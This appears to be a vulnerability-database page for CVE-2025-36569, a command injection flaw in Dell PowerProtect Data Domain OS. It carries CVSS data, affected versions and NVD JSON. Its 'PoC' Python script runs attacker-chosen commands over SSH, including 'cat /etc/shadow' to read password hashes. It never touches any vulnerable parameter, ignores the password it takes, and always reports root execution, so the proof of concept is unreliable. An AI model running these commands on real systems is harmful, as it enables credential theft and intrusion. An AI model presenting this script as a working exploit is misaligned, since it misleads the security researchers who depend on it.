Security Vulnerability Report
中文
CVE-2025-36569 CVSS 6.7 MEDIUM

CVE-2025-36569

Published: 2025-10-07 20:15:34
Last Modified: 2025-10-14 20:18:00
Source: [email protected]

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability to execute arbitrary commands with root privileges.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.1.0.10
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.25
Dell PowerProtect Data Domain DD OS LTS 2023 7.10.1.0 - 7.10.1.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36569 - Dell PowerProtect Data Domain OS Command Injection PoC # Vulnerability: Improper Neutralization of Special Elements used in an OS Command # Affected: DD OS Feature Release 7.7.1.0-8.1.0.10, LTS2024 7.13.1.0-7.13.1.25, LTS 2023 7.10.1.0-7.10.1.50 # Requirements: Local access with high-privilege credentials import subprocess import sys def exploit(target_host, username, password, command): """ Exploit OS Command Injection in Dell PowerProtect Data Domain DD OS The vulnerability allows execution of arbitrary commands as root by injecting shell metacharacters through privileged input fields. """ # Step 1: Establish SSH session with high-privilege credentials ssh_cmd = f"ssh {username}@{target_host}" # Step 2: Inject malicious command through vulnerable parameter # Example: injecting through a system command field that doesn't sanitize input payload = f"{command}; id; whoami; cat /etc/shadow" # Step 3: Execute the injected payload through the vulnerable interface # The DD OS fails to properly neutralize special shell elements full_cmd = f"{ssh_cmd} \"{payload}\"" print(f"[*] Connecting to {target_host} as {username}") print(f"[*] Injecting payload: {payload}") try: result = subprocess.run( full_cmd, shell=True, capture_output=True, text=True, timeout=30 ) print(f"[+] Command executed with root privileges") print(f"[+] Output: {result.stdout}") return result.stdout except Exception as e: print(f"[-] Exploit failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python3 exploit.py <target_host> <username> <password> <command>") print("Example: python3 exploit.py 192.168.1.100 admin password 'system status'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] cmd = sys.argv[4] exploit(target, user, passwd, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36569", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:34.293", "lastModified": "2025-10-14T20:18:00.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability to execute arbitrary commands with root privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.60", "matchCriteriaId": "F2389C08-162A-4D43-B1EA-D93D7DB51781"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.30", "matchCriteriaId": "5E7EC11C-C065-48D9-A036-5A17653D44EA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.3.0.10", "matchCriteriaId": "FD518568-542A-420D-B0E6-6F35E127E5CE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.